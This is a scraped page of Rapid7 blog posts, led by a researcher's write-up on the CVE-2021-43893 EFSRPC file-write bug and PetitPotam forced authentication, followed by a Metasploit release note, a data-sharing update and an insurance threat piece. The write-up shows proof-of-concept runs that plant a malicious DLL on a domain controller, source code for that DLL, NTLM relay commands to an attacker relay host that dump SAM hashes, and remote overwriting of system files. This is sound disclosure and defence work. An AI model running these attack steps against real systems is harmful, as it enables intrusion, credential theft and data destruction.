The tweet suggests that CVE-2021-43893 was only issued a partial fix in the December 2021 update and that authenticated and remote users could still write arbitrary files on domain controllers. James linked to the Project Zero bug tracker, where an extended writeup and some proof-of-concept code was stored.

This vulnerability was of particular interest to me, because I had recently discovered a local privilege escalation (LPE) using file planting in a Windows product. The vulnerable product could reasonably be deployed on a system with unconstrained delegation, which meant I could use CVE-2021-43893 to remotely plant the file as a low-privileged remote user, turning my LPE into RCE.

I set out to investigate if the remote file-writing aspect of James Forshaw’s bug was truly unpatched. The investigation resulted in a few interesting observations:

  • Low-privileged user remote file-writing was patched in the December update. However, before the December update, a remote low-privileged user really could write arbitrary files on system-assigned unconstrained delegation.
  • Forced authentication and relaying are still not completely patched. Relay attacks initiated on the efsrpc named pipe have been known since inclusion in PetitPotam in July 2021. The issue seems to persist despite multiple patch attempts.

Although the file upload aspect of this vulnerability has been patched, I found the vulnerability quite interesting. The vulnerability is certainly limited by the restrictions on where a low-privileged user can create files on a Domain Controller, and maybe that is why the vulnerability didn’t receive more attention. But as I touched upon, it can be paired with a local vulnerability to achieve remote code execution, and as such, I thought it deserved more attention. I also have found the failure to properly patch forced authentication over the EFSRPC protocol to be worthy of more examination.

Inadequate EFSPRC forced authentication patching: A brief history of PetitPotam

PetitPotam was released in the summer of 2021 and was widely associated with an attack chain that starts as an unauthenticated and remote attacker and ends with domain administrator privileges. PetitPotam is only the beginning of that chain. It allows an attacker to force a victim Windows computer to authenticate to a third party (e.g. MITRE ATT&CK T118 – forced authentication). The full chain is interesting, but this discussion is only interested in the initial portion triggered by PetitPotam.

PetitPotam triggers forced authentication using the EFSRPC protocol. The original implementation of the exploit performed the attack over the lsarpc named pipe. The attack is quite simple. Originally, PetitPotam sent the victim server an EfsRpcOpenFileRaw request containing a UNC file path. Using a UNC path such as \\10.0.0.4\fake_share\fake_file forces the victim server to reach out to the third-party server, 10.0.0.4 in this example, in order to read off of the desired file share. The third-party server can then tell the victim to authenticate in order to access the share, and the victim obliges. The result is the victim leaks their Net-NTLM hash. That’s the whole thing. We will later touch on what an attacker can do with this hash, but for this section, that’s all we need to know.

Microsoft first attempted to patch the EFSRPC forced authentication in August 2021 by blocking the use of EfsRpcOpenFileRaw over the lsarpc named pipe. To do this, they added logic to efslsaext.dll’s EfsRpcOpenFileRaw_Downllevel function to check for a value stored in the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EFS\AllowOpenRawDL. Because this registry key doesn’t exist by default, a typical configuration will always fail this check.

Dropping Files on a Domain Controller Using CVE-2021-43893

That patch was inadequate, because EfsRpcOpenFileRaw isn’t the only EFSRPC function that accepts a UNC file path as a parameter. PetitPotam was quickly updated to use EfsRpcEncryptFileSrv, and just like that, the patch was bypassed.

The patch also failed to recognize that the lsarpc named pipe wasn’t the only named pipe that EFSRPC can be executed over. The efsrpc named pipe (among others) can also be used. efsrpc named pipe is slightly less desirable, since it requires the attacker to be authenticated, but the attack works over that pipe, and it doesn’t use the EfsRpcOpenFileRaw_Downlevel function. That means an attacker can also bypass the patch by switching named pipes.

As mentioned earlier, PetitPotam was updated in July 2021 to use the efsrpc named pipe. The following output shows PetitPotam forcing a Domain Controller patched through November 2021 to authenticate with an attacker controlled box running Responder.py (10.0.0.6) (I’ve left out the Responder bit since this is just meant to highlight the EFSRPC was available and unpatched for months).

albinolobster@ubuntu:~/impacket/examples$ python3 petitpotam.py -pipe efsr -u 'lowlevel' -p ‘cheesed00dle!' -d okhuman.ninja  10.0.0.6 10.0.0.5 

                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



[-] Connecting to ncacn_np:10.0.0.5[\PIPE\efsrpc]
[+] Connected!
[+] Binding to df1941c5-fe89-4e79-bf10-463657acf44d
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Not only did Microsoft fail to patch the issue, but they didn’t issue follow-up patches for months. They also haven’t updated their advisory indicating the vulnerability has been exploited in the wild, despite its inclusion in CISA’s Known Exploited Vulnerability Catalog.

Dropping Files on a Domain Controller Using CVE-2021-43893

In December 2021, Microsoft released a patch for a different EFSRPC vulnerability: CVE-2021-43217. As part of the remediation for that issue, Microsoft implemented some hardening measures on EFSRPC communication. In particular, EFSRPC clients would need to use RPC_C_AUTHN_LEVEL_PKT_PRIVACY when using EFSRPC. If the client fails to do so, then the client is rejected and a Windows application event is generated.

Dropping Files on a Domain Controller Using CVE-2021-43893

At the time of the December patch, PetitPotam didn’t use this specific setting. However, a quick update allowed the exploit to comply with the new requirement and get back to leaking machine account NTLM hashes of fully patched Windows machines.

CVE-2021-43893: Windows EFS remote file upload

James Forshaw’s CVE-2021-43893 dives deeper into the EFSRPC functionality, but the heart of the issue is still a UNC file path problem. PetitPotam’s UNC path pointed to an external server, but CVE-2021-43893 points internally using the UNC path: \\.\C:\. Using a UNC path that points to the victim’s local file system allows attackers to create files and directories on the victim file system.

There are two major caveats to this vulnerability. First, the file-writing aspect of this vulnerability only appears to work on systems with unconstrained delegation. That’s fine if you are only interested in Domain Controllers, but less good if you are only interested in workstations.

Second, the victim server is impersonating the attacker when the file manipulation occurs. This means a low-privileged attacker can only write to the places where they have permission (e.g. C:\ProgramData\). Therefore, exploitation resulting in code execution is not a given. Still, while code execution isn’t guaranteed, there are many plausible scenarios that could lead there.

A plausible scenario leading to RCE using CVE-2021-43893

My interest in this vulnerability started with a local privilege escalation that I wanted to convert into remote code execution as a higher-privileged user. We can’t yet share the LPE as it’s still unpatched, but we can create a plausible scenario that demonstrates the ability to achieve code execution.

Microsoft has long maintained that Microsoft services vulnerable to DLL planting via a world writable %PATH% directory are won’t-fix low-security issues — a weird position given the effort it would take to fix such issues. But regardless, exploiting world-writable %PATH to escalate privileges via a Windows service (MITRE ATT&CK – Hijack Execution Flow: DLL Search Order Hijacking) is a useful technique when it’s available.

There’s a well-known product that installs itself into a world-writable directory: Python 2.7, all the way through it’s final release 2.7.18.

C:\Users\administrator>icacls.exe C:\Python27\
C:\Python27\ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
             BUILTIN\Administrators:(I)(OI)(CI)(F)
             BUILTIN\Users:(I)(OI)(CI)(RX)
             BUILTIN\Users:(I)(CI)(AD)
             BUILTIN\Users:(I)(CI)(WD)
             CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

The Python 2.7 installer drops files into C:\Python27\ and provides the user with the following instructions:

Besides using the automatically created start menu entry for the Python interpreter, you might want to start Python in the DOS prompt. To make this work, you need to set your %PATH% environment variable to include the directory of your Python distribution, delimited by a semicolon from other entries. An example variable could look like this (assuming the first two entries are Windows’ default):

C:\WINDOWS\system32;C:\WINDOWS;C:\Python25

Typing python on your command prompt will now fire up the Python interpreter. Thus, you can also execute your scripts with command line options, see Command line documentation.

Following these instructions, we now have a world-writable directory in %PATH% — which is, of course, the exploitable condition we were looking for. Now we just have to find a Windows service that will search for a missing DLL in C:\Python27\. I quickly accomplished this task by restarting all the running services on a test Windows Server 2019 and watching procmon. I found a number of services will search C:\Python27\ for:

  • fveapi.dll
  • cdpsgshims.dll

To exploit this, we just need to drop a “malicious” DLL named fveapi.dll or cdpsgshims.dll in C:\Python27. The DLL will be loaded when a vulnerable service restarts or the server reboots.

For this simple example, the “malicious” dll just creates the file C:\r7.txt:

#include <Windows.h>

HANDLE hThread;
DWORD dwThread;

DWORD WINAPI doCreateFile(LPVOID)
{
    HANDLE createFile = CreateFileW(L"C:\\r7.txt", GENERIC_WRITE, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
    CloseHandle(createFile);
    return 0;
}

BOOL APIENTRY DllMain( HMODULE, DWORD  ul_reason_for_call, LPVOID)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hThread = CreateThread(NULL, 0, doCreateFile, NULL, 0, &dwThread);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

After compiling the DLL, an attacker can remotely drop the file into C:\Python27 using CVE-2021-43893. The following is the output from our refactored and updated version of Forshaw’s original proof of concept. The attacker is attempting to remotely write the DLL on 10.0.0.6 (vulnerable.okhuman.ninja):

C:\ProgramData>whoami
okhuman\lowlevel

C:\ProgramData>.\blankspace.exe -r vulnerable.okhuman.ninja -f \\.\C:\Python27\fveapi.dll -i ./dll_inject64.dll
 ____    ___                    __          ____
/\  _`\ /\_ \                  /\ \        /\  _`\
\ \ \L\ \//\ \      __      ___\ \ \/'\    \ \,\L\_\  _____      __      ___     __
 \ \  _ <'\ \ \   /'__`\  /' _ `\ \ , <     \/_\__ \ /\ '__`\  /'__`\   /'___\ /'__`\
  \ \ \L\ \\_\ \_/\ \L\.\_/\ \/\ \ \ \\`\     /\ \L\ \ \ \L\ \/\ \L\.\_/\ \__//\  __/
   \ \____//\____\ \__/.\_\ \_\ \_\ \_\ \_\   \ `\____\ \ ,__/\ \__/.\_\ \____\ \____\
    \/___/ \/____/\/__/\/_/\/_/\/_/\/_/\/_/    \/_____/\ \ \/  \/__/\/_/\/____/\/____/
                                                        \ \_\
                                                         \/_/
[+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja
[+] Attempting to write to \\.\C:\Python27\fveapi.dll
[+] Encrypt the empty remote file...
[+] Reading the encrypted remote file object
[+] Read back 1244 bytes
[+] Writing 92160 bytes of attacker data to encrypted object::$DATA stream
[+] Decrypt the the remote file
[!] Success!

C:\ProgramData>

The attack yields the desired output, and the file is written to C:\Python27\ on the remote target.

Dropping Files on a Domain Controller Using CVE-2021-43893

Below is the Procmon output demonstrating successful code execution as NT AUTHORITY\ SYSTEM when the “DFS Replication” service is restarted. Note that the malicious DLL is loaded and the file “C:\r7.txt” is created.

Dropping Files on a Domain Controller Using CVE-2021-43893

Do many administrators install Python 2.7 on their Domain Controller? I hope not. That wasn’t really the point. The point is that exploitation using this technique is plausible and worthy of our collective attention to ensure that it gets patched and monitored for exploitation.

What can a higher-privileged user do?

Oddly, administrators can do anything a low-level user can do except write data to files. When the administrator attempts to write to a file using Forshaw’s ::DATA stream technique, the result is an ACCESS DENIED error. Candidly, I didn’t investigate why.

However, it is interesting to note that the administrative user can remotely overwrite all files. This doesn’t serve much purpose from an offensive standpoint, but would serve as an easy, low-effort wiper or data destruction attack. Here is a silly example of remotely overwriting calc.exe from an administrator account.

C:\ProgramData>whoami
okhuman\test_admin

C:\ProgramData>.\blankspace.exe -r vulnerable.okhuman.ninja -f \\.\C:\Windows\System32\calc.exe -s "aaaaaaaaaaaa"
 ____    ___                    __          ____
/\  _`\ /\_ \                  /\ \        /\  _`\
\ \ \L\ \//\ \      __      ___\ \ \/'\    \ \,\L\_\  _____      __      ___     __
 \ \  _ <'\ \ \   /'__`\  /' _ `\ \ , <     \/_\__ \ /\ '__`\  /'__`\   /'___\ /'__`\
  \ \ \L\ \\_\ \_/\ \L\.\_/\ \/\ \ \ \\`\     /\ \L\ \ \ \L\ \/\ \L\.\_/\ \__//\  __/
   \ \____//\____\ \__/.\_\ \_\ \_\ \_\ \_\   \ `\____\ \ ,__/\ \__/.\_\ \____\ \____\
    \/___/ \/____/\/__/\/_/\/_/\/_/\/_/\/_/    \/_____/\ \ \/  \/__/\/_/\/____/\/____/
                                                        \ \_\
                                                         \/_/
[+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja
[+] Attempting to write to \\.\C:\Windows\System32\calc.exe
[+] Encrypt the empty remote file...
[-] EfsRpcEncryptFileSrv failed with status code: 5

C:\ProgramData>

As you can see from the output, the tool failed with status code 5 (Access Denied). However, calc.exe on the remote device was successfully overwritten.

Dropping Files on a Domain Controller Using CVE-2021-43893

Technically speaking, this doesn’t really represent a security boundary being crossed. Administrators typically have access to \host\C$ or \host\admin$, but the difference in behavior seemed worth mentioning. I’d also note that as of February 2022, administrative users can still do this using \\localhost\C$\Windows\System32\calc.exe.

Forshaw also mentioned in his original writeup, and I confirmed, that this attack generates the attacking user’s roaming profile on the victim server. That could be a pretty interesting file-upload vector if the Active Directory environment synchronizes roaming directories. Again, I didn’t investigate that any further, but it could be useful in the correct environment.

Forced authentication still not entirely patched

The December 2021 patch brought multiple changes to efslsaext.dll and resulted in partial mitigation of CVE-2021-43893. One of the changes was the introduction of two new functions: EfsEnsureLocalPath and EfsEnsureLocalHandle. EfsEnsureLocalPath grabs a HANDLE for the attacker provided file using CreateW. The HANDLE is then passed to EfsEnsureLocalHandle, which passes the HANDLE to NtQueryVolumeInformationFile to validate the characteristics flag doesn’t contain FILE_REMOTE_DEVICE.

Dropping Files on a Domain Controller Using CVE-2021-43893

Because the patch still opens a HANDLE using the attacker-controlled file path, EFSRPC remains vulnerable to forced authentication and relay attacks of the machine account.

Demonstration of the forced authentication and relay does not require the complicated attack often associated with PetitPotam. We just need three boxes:

The Relay (10.0.0.3): A Linux system running ntlmrelayx.py.
The Attacker (10.0.0.6): A fully patched Windows 10 system.
The Victim (10.0.0.12): A fully patched Windows Server 2019 system.

The only caveat for this example is that the victim’s machine account (aka computer account) is assigned to the Domain Admins group. Below, you can see the machine account for 10.0.0.12, YEET$, is a member of Domain Admins.

Dropping Files on a Domain Controller Using CVE-2021-43893

This may not be a common configuration, but it’s common enough that it’s been the subject of a couple excellent writeups.

The attack is launched by a low-privileged user on 10.0.0.6 using the blankspace.exe proof of concept. The attack will force 10.0.0.12 (yet.okhuman.ninja) to authenticate to the attacker relay at 10.0.0.3

C:\ProgramData>blankspace.exe -r yeet.okhuman.ninja -f \\10.0.0.3\r7\r7 --relay
 ____    ___                    __          ____
/\  _`\ /\_ \                  /\ \        /\  _`\
\ \ \L\ \//\ \      __      ___\ \ \/'\    \ \,\L\_\  _____      __      ___     __
 \ \  _ <'\ \ \   /'__`\  /' _ `\ \ , <     \/_\__ \ /\ '__`\  /'__`\   /'___\ /'__`\
  \ \ \L\ \\_\ \_/\ \L\.\_/\ \/\ \ \ \\`\     /\ \L\ \ \ \L\ \/\ \L\.\_/\ \__//\  __/
   \ \____//\____\ \__/.\_\ \_\ \_\ \_\ \_\   \ `\____\ \ ,__/\ \__/.\_\ \____\ \____\
    \/___/ \/____/\/__/\/_/\/_/\/_/\/_/\/_/    \/_____/\ \ \/  \/__/\/_/\/____/\/____/
                                                        \ \_\
                                                         \/_/
[+] Creating EFS RPC binding handle to yeet.okhuman.ninja
[+] Sending EfsRpcDecryptFileSrv for \\10.0.0.3\r7\r7
[-] EfsRpcDecryptFileSrv failed with status code: 53
[+] Network path not found error received!
[!] Success!

C:\ProgramData>

The Linux relay is running ntlmrelayx.py and configured to relay the YEET$ authentication to 10.0.0.6 (the original attacker box). Below, you can see ntlmrelayx.py capture the authentication and send it on to 10.0.0.6.

albinolobster@ubuntu:~/impacket/examples$ sudo python3 ntlmrelayx.py -debug -t 10.0.0.6 -smb2support 
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[*] SMBD-Thread-4: Connection from OKHUMAN/[email protected] controlled, attacking target smb://10.0.0.6
[*] Authenticating against smb://10.0.0.6 as OKHUMAN/YEET$ SUCCEED

The relay is now authenticated to 10.0.0.6 as YEET$, a domain administrator. It can do pretty much as it pleases. Below, you can see it dumps the local SAM database.

[*] Target system bootKey: 0x9f868ddb4e1dfc56d992aa76ff931df4
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6aa01bb4a68e7fd8650cdeb6ad2b63ec:::
[+] NewStyle hashes is: True
albinolobster:1000:aad3b435b51404eeaad3b435b51404ee:430ef7587d6ac4410ac8b78dd5cc2bbe:::
[*] Done dumping SAM hashes for host: 10.0.0.6

It’s as easy as that. All you have to do is find a host with a machine account in the domain admins group:

C:\ProgramData>net group "domain admins" /domain
The request will be processed at a domain controller for domain okhuman.ninja.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            test_domain_admin        YEET$
The command completed successfully.


C:\ProgramData>

Once you have that, a low-privileged remote attacker can use EFSRPC to relay and escalate to other machines. However, the attack isn’t exactly silent. On 10.0.0.6, event ID 4624 was created when the 10.0.0.3 relay logged in using the YEET$ machine account.

Dropping Files on a Domain Controller Using CVE-2021-43893

Final thoughts and remediation

What began as an investigation into using an unpatched remote file-write vulnerability ended up being a history lesson in EFSRPC patches. The remote file-write vulnerability that I originally wanted to use has been patched, but we demonstrated the forced authentication issue hasn’t been adequately fixed. There is no doubt that Windows developers have a tough job. However, a lot of the issues discussed here could have been easily avoided with a reasonable patch in August 2021. The fact that they persist today says a lot about the current state of Windows security.

To mitigate these issues as best as possible, as always, ensure your systems are successfully updated monthly. Microsoft has released multiple advisories with recommendations regarding NTLM Relay-based attacks (see: Microsoft Security Advisory 974926
and KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS). The most important advice is to ensure SMBv1 no longer exists in your environment and to require SMB signing.

Some other general advice:

  • Monitoring for event ID 4420 in Windows application event logs can help detect EFSRPC-based hacking tools.
  • Monitor for event ID 4624 in Windows security event logs for remote machine account authentication.
  • Audit machine accounts to ensure they are not members of Domain Admins.
    If possible, audit %PATH% of critical systems to ensure no world-writable path exists.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2021-43893 with authenticated vulnerability checks available in the December 15, 2021 content release.

Metasploit Framework users can test their exposure to forced authentication attacks with a new PetitPotam module available in the 6.1.29 release.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Metasploit Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2022/02/11/metasploit-wrap-up-148/

Welcome, Little Hippo: PetitPotam

Metasploit Wrap-Up

Our very own @zeroSteiner ported the PetitPotam exploit to Metasploit this week. This module leverages CVE-2021-36942, a vulnerability in the Windows Encrypting File System (EFS) API, to capture machine NTLM hashes. This uses the EfsRpcOpenFileRaw function of the Microsoft’s Encrypting File System Remote Protocol API (MS-EFSRPC) to coerce machine authentication to a user-controlled listener host. Metasploit’s SMB capture server module can be used for this. The captured hashes are typically used as part of a NTLM relaying attack to take over other Windows hosts. Note that Microsoft has published some guidance about how to mitigate NTLM relay attacks.

QEMU Human Monitor Interface RCE

Contributor @bcoles added an exploit module that abuse QEMU’s Monitor Human Monitor Interface (HMP) TCP server to execute arbitrary commands by using the migrate HMP command. Furthermore, since the HMP TCP service is reachable from emulated devices, it is possible to escape QEMU from a guest system using this module. Note that it doesn’t work on Windows hosts since the migrate command cannot spawn processes on this platform.

New module content (2)

  • PetitPotam by GILLES Lionel and Spencer McIntyre, which exploits CVE-2021-36942 – This adds a new auxiliary scanner module that ports the PetitPotam tool to Metasploit andleverages CVE-2021-36942 to coerce Windows hosts to authenticate to a user-specific host, which enables an attacker to capture NTLM credentials for further actions, such as relay attacks.
  • QEMU Monitor HMP ‘migrate’ Command Execution by bcoles – This adds a module that can exploit the QEMU HMP service to execute OS commands. The HMP TCP service is reachable from emulated devices, so it is possible to escape QEMU by exploiting this vulnerability.

Enhancements and features

  • #16010 from lap1nou – This updates the zabbix_script_exec module with support for Zabbix version 5.0 and later. It also adds a new item-based execution technique and support for delivering Linux native payloads.
  • #16163 from zeroSteiner – Support has been added for the ClaimsPrincipal .NET deserialization gadget chain, which was found by jang. An exploit which utilizes this enhancement will arrive shortly.
  • #16125 from bcoles – This module can exploit GXV3140 models now that an ARCH_CMD target has been added.

Bugs fixed

  • #16121 from timwr – This fixes an exception caused by exploits that call rhost() in Msf::Post::Common without a valid session.
  • #16142 from timwr – This fixes an issue with Meterpreter’s getenv command that was not returning NULL when querying for a non-existing environment variable.
  • #16143 from sjanusz-r7 – This fixes an issue where a Cygwin SSH session was not correctly identified being a Windows device, due to a case sensitivity issue
  • #16147 from zeroSteiner – This fixes a bug where ssh_enumusers would only use one source in the generation of its user word list if both USERNAME and USER_FILE options were set. The module now pulls from all possible datastore options if they are set, including a new option DB_ALL_USERS.
  • #16160 from zeroSteiner – This fixes a crash when msfconsole is unable to correctly determine the hostname and current user within a shell prompt.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Evolving How We Share Rapid7 Research Data

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/02/10/evolving-how-we-share-rapid7-research-data-2/

Evolving How We Share Rapid7 Research Data

In the spring of 2018, we launched the Open Data initiative to provide security teams and researchers with access to research data generated from Project Sonar and Project Heisenberg. Our goal for those projects is to understand how the attack surface is evolving, what exposures are most common or impactful, and how attackers are taking advantage of these opportunities. Ultimately, we want to be able to advocate for necessary remediation actions that will reduce opportunities for attackers and advance security. This is also why we publish extensive research reports highlighting key security learnings and mitigation recommendations.

Our goal for Open Data has been to enable others to participate in these efforts, increasing the positive impact across the community. Open Data was an evolution of our participation in the scans.io project, hosted by the University of Michigan. Our hope was that security professionals would apply the research data to their own environments to reduce their exposure and researchers would use the data to uncover insights to help educate the community on security best practices.

Changing times

Since we first launched Open Data, we’ve been mindful that sharing large amounts of raw data may not maximize value for recipients and lead to the best security outcomes. It is efficient for us, as it can be automated, but we have constantly sought more impactful and productive ways to share the data. Where possible, we’ve developed partnerships with key nonprofit organizations and government entities that share our goals and values around advancing security and reducing exposure. We’ve looked for ways to make the information more accessible for internal security teams.

Fast forward to 2021, and wow, what a few years we’ve had. We’ve faced a global pandemic, which has really brought home our increased reliance on connected technologies, and amplified the need for privacy protections and understanding of digital threats. During the past few years, we have also seen an evolving regulatory environment for data protection. Back in 2018, GDPR was just coming into effect, and everyone was trying to figure out its implications. In 2020, we saw California join the party with the introduction of CCPA. It seems likely we will see more privacy regulations follow.

The surprising thing is not this focus on privacy, which we wholeheartedly support, but rather the inclusion and control of IP addresses as personal data or information. We believe security research supports better security outcomes, which in turn enables better privacy. It’s fundamentally challenging to maintain privacy without understanding and addressing security challenges.

Yet IP addresses make up a significant portion of the data being shared in our security research data. While we believe there is absolutely a legitimate interest in processing this kind of data to advance cybersecurity, we also recognize the need to take appropriate balancing controls to protect privacy and ensure that the processing is “necessary and proportionate” — per the language of Recital 49.

Evolving data sharing

So what does this mean? To date, Open Data included two elements:

  • A free sign-up service that was subject to light vetting and terms of service, and provides access to current and historical research data
  • Free access (no account required) to a one-month window of recent data from Project Sonar shared on the Rapid7 website

Beginning today, the latter will no longer be available. For the former, we still want to be able to provide data to help security teams and researchers identify and mitigate exposures. Our goals and values on this have not changed in any way since the inception of Open Data. What has evolved — apart from the regulatory landscape — is our thinking on the best ways to do this.

For Rapid7 customers, we launched Project Doppler, a free tool that provides insight into an organization’s external exposures and attack surface. Digging their own specific information out of our mountain of internet-wide scan data is the use case most Rapid7 customers want, so Doppler makes that much, much easier.

We are working on how we might practically extend Project Doppler more broadly to be available for other internal infosec teams, while still protecting privacy in line with regulatory requirements.

For governments, ISACs, and other nonprofits working on security advocacy to reduce opportunities for attackers, please contact us; we believe we share a mission to advance security and want to continue to support you in this. We will continue to provide free access to the data with appropriate balancing controls (such as geo-filtering) and legal agreements (such as for data retention) in place.

For legitimate public research projects, we have a new submission process so you can request access to the Project Sonar data sets for a limited time and subject to conditions for sharing your findings to advance the public good. Please email [email protected] for more information or to make a submission.

While it was not the primary goal or intention behind the Open Data initiative, we recognize that there are also entities using the data for commercial projects. We are not intentionally trying to hinder this, but per privacy regulations, we need to ensure we have more vetting and controls in place. If you are interested in discussing options for incorporating Project Sonar data into a commercial offering, please contact [email protected].

If you have a use case for Project Sonar data that does not fit into one of the categories above, please contact us. We welcome any opportunity to better understand how our data may be useful, and we want to continue to advance security and support the security community as best we can.

More advocacy, better outcomes

While these changes are being triggered by the evolving regulatory landscape, we believe that ultimately they will lead to more productive data sharing and better security outcomes. We’re still not sold on the view that IP addresses should be viewed as personal dataI, but we recognize the value of a more thoughtful and tailored approach to data sharing that both supports data protection values and also promotes more security advocacy and remediation action.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

The Big Target on Cyber Insurers’ Backs

Post Syndicated from Paul Prudhomme original https://blog.rapid7.com/2022/02/08/the-big-target-on-cyber-insurers-backs/

The Big Target on Cyber Insurers' Backs

Here at IntSights, a Rapid7 company, our goal is to equip organizations around the world with an understanding of the threats facing them in today’s cyber threat landscape. Most recently, we took a focused look at the insurance industry — a highly targeted vertical due to the amount of personally identifiable information (PII) these organizations hold. We’ve collected our findings in the “2022 Insurance Industry Cyber Threat Landscape Report,” which you can read in full right now.

While conducting this research, one key takeaway caught my eye: the big target on cyber insurers’ backs. Some of these organizations provide cyber insurance coverage for businesses, so in the event of a breach that imposes significant costs on a targeted business, that business is not 100% financially liable.

According to our cyber threat intelligence research, cyber insurance providers are even more appealing targets for bad actors in an industry already full of appealing targets. That begged the question: Why are cyber insurers so highly targeted? And what can they do to protect themselves in the face of these threats?

Cyber insurance providers are data goldmines

Typically, bad actors are angling to breach insurance companies to access PII or to collect policyholder details that they can use for insurance fraud. However, when hackers target cyber insurers, they’re seeking even more specific types of data, such as cyber insurance policy details and information outlining the security standards cyber insurance clients follow.

Why is this the case? A ransomware operation could, for example, leverage this information to build a list of potential targets covered under a cyber insurance policy. Some cyber insurance providers will pay an insured victim’s ransom, and if this is stated in the policy, these clients will bump up on the list of high-value targets, because the bad actors may assume they’re more likely to pay a ransom.

Knowledge of the security standards cyber insurers require their customers to fulfill is also dangerous in the wrong hands. It can help attackers craft their techniques to evade victims’ security measures. For example, they may completely avoid strongly defended points of entry and instead target areas of the perimeter with weaker protections. While not a guaranteed path to success, it gives bad actors more information to work with, and that’s never a good thing.

These are very real — and unique — threats facing the cyber insurance segment, and we’ve seen a few breaches like this play out already. In 2021, CNA Financial, a leading US insurance company that provides cyber insurance policies, suffered a cyberattack and reportedly paid a ransom of $40 million USD to ransomware operators.

Other cyber insurance companies that experienced breaches include Tokio Marine Insurance Singapore in August 2021 and global cyber insurer AXA in May 2021. The AXA breach happened shortly after it announced it would stop reimbursing new French customers for ransom payments after ransomware attacks. This was in response to claims by French officials that cyber insurance coverage of ransom payments encouraged more ransomware attacks and higher ransom demands. The attackers may have aimed to punish AXA for this decision, just going to show that the French officials may have been correct in their claim.

How cyber insurers can better protect their data

To defend themselves and their clients against ransomware attacks and data breaches, cyber insurers can follow a few simple steps:

  • Avoid publicly identifying specific customers by name for any reason. For example, it’s common practice to list the names of your biggest brands or enterprise clients on your website. However, this may make your business more appealing to hackers. They may view your organization as a gateway to gain access to your clients — if they can break through your security perimeter, they may get an even larger payload of data from the clients that can foot more expensive ransoms.
  • Refrain from listing any details about the cyber insurance policies you provide. If you publish information about how much your policy compensates the insured in the event of a ransomware attack or security breach, bad actors can use this data to calculate an optimal ransom amount that’s high enough to maximize profit but low enough for victims to accept. As such, your policy details will need extra protection, including encryption and network segmentation.
  • Scrutinize public-facing web applications and other infrastructure, like automated quote tools. Misconfiguration of these applications and bugs can inadvertently expose customer data. Hackers will often target these types of online portals and tools to learn more about a cyber insurer’s policies, and in some cases, they can even gain access to the information they store, which can then be exploited.
  • Finally, employ rigorous cyber threat intelligence. A key component of any risk management and cybersecurity strategy, threat intelligence can help cyber insurance providers understand the types of data that bad actors hope to steal from them, the methods they may use to obtain it, and even the ransomware operators targeting them. These insights can help your team shore up security against impending threats and remediate malicious actions faster in the event of a breach.

By following these recommendations, cyber insurance providers around the world can better protect their data as well as the sensitive information of their partners, clients, and customers. Because of all the valuable data these organizations house, the target on their backs won’t go away, so the best defensive strategy is a proactive one. Comprehensive cyber threat intelligence can play a critical role there.

Take a deep dive into the threats facing the insurance industry today by reading the full research report here: “2022 Insurance Industry Cyber Threat Landscape Report.”

Additional reading:

Calling all Computing and ICT teachers in the UK and Ireland: Have your say

Post Syndicated from Sue Sentance original https://www.raspberrypi.org/blog/computing-ict-teacher-survey-uk-ireland-ukicts-call-for-responses/

Back in October, I wrote about a report that the Brookings Institution, a US think tank, had published about the provision of computer science in schools around the world. Brookings conducted a huge amount of research on computer science curricula in a range of countries, and the report gives a very varied picture. However, we believe that, to see a more complete picture, it’s also important to gather teachers’ own perspectives on their teaching.

school-aged girls and a teacher using a computer together.

Complete our survey for computing teachers

Experiences shared by teachers on the ground can give important insights to educators and researchers as well as to policymakers, and can be used to understand both gaps in provision and what is working well. 

